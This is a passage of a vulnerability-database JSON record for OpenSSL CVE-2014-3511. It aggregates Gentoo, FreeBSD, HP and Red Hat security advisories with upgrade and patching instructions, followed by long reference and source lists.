contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFU253LXlSAg2UNWIIRAjJEAKCrqGkFJHhLN3Iqt069y96etuCAxgCcCTWW\n1SViofNGiqbiufMWwY7okg4=\n=cjiU\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201412-39\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 26, 2014\n Bugs: #494816, #519264, #525468\n ID: 201412-39\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\ncould result in Denial of Service or Man-in-the-Middle attacks. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.1j *\u003e= 0.9.8z_p2\n \u003e= 1.0.1j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll OpenSSL 1.0.1 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1j\"\n\nAll OpenSSL 0.9.8 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8z_p2\"\n\nPackages which depend on this library may need to be recompiled. Tools\nsuch as revdep-rebuild may assist in identifying these packages. \n\nReferences\n==========\n\n[ 1 ] CVE-2013-6449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449\n[ 2 ] CVE-2013-6450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450\n[ 3 ] CVE-2014-3505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505\n[ 4 ] CVE-2014-3506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506\n[ 5 ] CVE-2014-3507\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507\n[ 6 ] CVE-2014-3509\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509\n[ 7 ] CVE-2014-3510\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510\n[ 8 ] CVE-2014-3511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511\n[ 9 ] CVE-2014-3512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512\n[ 10 ] CVE-2014-3513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513\n[ 11 ] CVE-2014-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567\n[ 12 ] CVE-2014-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568\n[ 13 ] CVE-2014-5139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-39.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n\nReferences:\n\nCVE-2014-3508\nCVE-2014-3509\nCVE-2014-3511\nCVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\nCVE-2014-5139\nSSRT101894\nSSRT101916\nSSRT101918\nSSRT101920\nSSRT101921\nSSRT101922\nSSRT101923\nSSRT101925\nSSRT101926\nSSRT101927\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The HP Matrix\nOperating Environment v7.2.3 Update kit applicable to HP Matrix Operating\nEnvironment 7.2.x installations is available at the following location:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPID\n\nNOTE: Please read the readme.txt file before proceeding with the\ninstallation. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-14:18.openssl Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSL multiple vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2014-09-09\nAffects: All supported versions of FreeBSD. \nCorrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE)\n 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8)\n 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE)\n 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1)\n 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11)\n 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18)\n 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE)\n 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15)\nCVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510,\n CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. [CVE-2014-5139]\n\nIII. Impact\n\nA remote attacker may be able to cause a denial of service (application\ncrash, large memory consumption), obtain additional information,\ncause protocol downgrade. Additionally, a remote attacker may be able\nto run arbitrary code on a vulnerable system if the application has been\nset up for SRP. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.0]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc\n# gpg --verify openssl-10.0.patch.asc\n\n[FreeBSD 9.3]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 9.2, 9.1, 8.4]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:http://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\n3) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r269687\nreleng/8.4/ r271305\nstable/9/ r269687\nreleng/9.1/ r271305\nreleng/9.2/ r271305\nreleng/9.3/ r271305\nstable/10/ r269686\nreleng/10.0/ r271304\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:http://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. \n\nReferences:\n\nCVE-2014-0224 Remote Unauthorized Access, Disclosure of Information\nCVE-2014-3509 Remote Denial of Service (DoS)\nCVE-2014-3511 Remote Unauthorized Access, Disclosure of Information\nCVE-2014-5139 Remote Denial of Service (DoS)\nSSRT101818\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nNote: For versions not listed, please contact support:\n\nNote: ServiceCenter 6.2 is impacted only if using the Directory Services\nintegration feature with the SC LDAP over SSL (LDAPS) protocol. If this\nfeature is in use, HP recommends that ServiceCenter 6.2 customers upgrade to\nService Manager 7.11, 9.21, or 9.34, and then apply the patches listed below. \n\nPatch Version\n Package Name / SSO URL\n\nSM711P22\n AIX Server 7.11.720 p22\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00614\n\nHP Itanium Server 7.11.720 p22\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00615\n\nHP parisc Server 7.11.720 p22\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00616\n\nLinux x86 Server 7.11.720 p22\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00617\n\nSolaris Server 7.11.720 p22\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00618\n\nWindows Server 7.11.720 p22\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00619\n\nSM921P9\n AIX server 9.21.706 P9\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00621\n\nHPUX/IA server 9.21.706 P9\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00622\n\nHPUX/PA server 9.21.706 P9\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00623\n\nLinux server 9.21.706 P9\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00624\n\nSolaris server 9.21.706 P9\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00625\n\nWindows server 9.21.706 P9\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00626\n\nSM934P2\n AIX Server 9.34.2003 p2\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00605\n\nHP Itanium Server 9.34.2003 p2\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00606\n\nLinux Server 9.34.2003 p2\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00607\n\nSolaris Server 9.34.2003 p2\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00608\n\nWindows Server 9.34.2003 p2\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/LID/HPSM_00609\n\nHISTORY\nVersion:1 (rev.1) - 22 January 2015 Initial release\nVersion:2 (rev.2) - 23 January 2015 added note for versions not listed in\ntable", "sources": [ { "db": "NVD", "id": "CVE-2014-3511" }, { "db": "BID", "id": "69079" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "130359" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "VULMON", "id": "CVE-2014-3511" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "130299" }, { "db": "PACKETSTORM", "id": "132085" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3511", "trust": 3.0 }, { "db": "BID", "id": "69079", "trust": 1.4 }, { "db": "SECUNIA", "id": "59700", "trust": 1.1 }, { "db": "SECUNIA", "id": "61100", "trust": 1.1 }, { "db": "SECUNIA", "id": "60803", "trust": 1.1 }, { "db": "SECUNIA", "id": "59710", "trust": 1.1 }, { "db": "SECUNIA", "id": "60810", "trust": 1.1 }, { "db": "SECUNIA", "id": "60917", "trust": 1.1 }, { "db": "SECUNIA", "id": "61017", "trust": 1.1 }, { "db": "SECUNIA", "id": "60921", "trust": 1.1 }, { "db": "SECUNIA", "id": "60221", "trust": 1.1 }, { "db": "SECUNIA", "id": "60022", "trust": 1.1 }, { "db": "SECUNIA", "id": "60938", "trust": 1.1 }, { "db": "SECUNIA", "id": "61139", "trust": 1.1 }, { "db": "SECUNIA", "id": "61043", "trust": 1.1 }, { "db": "SECUNIA", "id": "59756", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECUNIA", "id": "58962", "trust": 1.1 }, { "db": "SECUNIA", "id": "61775", "trust": 1.1 }, { "db": "SECUNIA", "id": "60377", "trust": 1.1 }, { "db": "SECUNIA", "id": "60684", "trust": 1.1 }, { "db": "SECUNIA", "id": "61184", "trust": 1.1 }, { "db": "SECUNIA", "id": "59887", "trust": 1.1 }, { "db": "SECUNIA", "id": "60890", "trust": 1.1 }, { "db": "SECUNIA", "id": "60493", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2014-06", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10084", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10649", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-3511", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130299", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128214", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130815", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131014", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132467", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129721", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132085", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127790", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137292", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137201", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132081", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130359", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131254", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127811", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169648", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3511" }, { "db": "BID", "id": "69079" }, { "db": "PACKETSTORM", "id": "130299" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "132085" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "130359" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "NVD", "id": "CVE-2014-3511" } ] }, "id": "VAR-201408-0081", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-23T21:31:18.574000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Red Hat: Critical: rhev-hypervisor6 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150126 - security advisory" }, { "title": "Tenable Security Advisories: [R4] Tenable Products Affected by OpenSSL Protocol Downgrade Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-06" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2308-1" }, { "title": "Debian Security Advisories: DSA-2998-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=bfd576c692d8814b2a331baf29ad367c" }, { "title": "Amazon Linux AMI: ALAS-2014-391", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-391" }, { "title": "Symantec Security Advisories: SA85 : OpenSSL Security Advisory 06-Aug-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=02a206cf2efb06aecdaf29aeca851b55" }, { "title": "Splunk Security Announcements: Splunk Enterprise 6.1.4 and 5.0.10 address four vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=f5716086497f074005596fe8e0bc5dce" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "oval", "trust": 0.1, "url": "https://github.com/jumanjihouse/oval " }, { "title": "wormhole", "trust": 0.1, "url": "https://github.com/jumanjihouse/wormhole " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3511" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3511" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 1.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.4, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:18.openssl.asc" }, { "trust": 1.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 1.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0197.html" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1052.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142350350616251\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-0126.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58962" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59887" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60377" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60684" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60810" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60890" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60938" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61017" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61043" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61139" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15564.html" }, { "trust": 1.1, "url": "http://www.arubanetworks.com/support/alerts/aid-08182014.txt" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69079" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.1, "url": "http://www.splunk.com/view/sp-caaanhs" }, { "trust": 1.1, "url": "http://www.tenable.com/security/tns-2014-06" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1127504" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95162" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10084" }, { "trust": 1.1, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 1.1, "url": "https://techzone.ergon.ch/cve-2014-3511" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=280b1f1ad12131defcd986676a8fc9717aaa601b" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.8, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.8, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.8, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.4, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682663" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_wan_boot" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684903" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004917" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096266" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004931" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686126" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004872" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574073" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/151" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10649\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182969" }, { "trust": 0.3, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512909" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04624296" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097658" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1052.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1054.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684913" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691014" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21715901" }, { "trust": 0.3, "url": 